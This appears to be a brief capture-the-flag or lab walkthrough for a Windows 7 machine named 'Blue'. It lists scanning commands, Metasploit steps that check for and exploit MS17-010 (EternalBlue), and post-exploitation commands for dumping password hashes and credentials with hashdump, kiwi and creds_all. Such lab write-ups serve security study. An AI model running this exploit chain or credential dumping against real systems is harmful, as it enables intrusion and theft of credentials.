Blue
Enumeration
sudo netdiscover -r 10.0.2.0/24
IP -> 10.0.2.6NMAP
nmap -T4 -p- -A <IP>Metasploit way
smb open
windows 7 Professional 7601 Service Pack 1
This means it was a possibility to be vulnerable to eternal blue 0 smb_ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $IP
run
Run eternal blue explit to root the machine
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run
Can try to change the payload to meterpetrer with staged payload
Manual way
Useful commands in windows
Windows shell
hashdump
getuid
sysinfo
route print
arp -a
netstat -ano
ps
Meterpreter
enter in shell (shell)
kiwi
help
creds_all
Last updated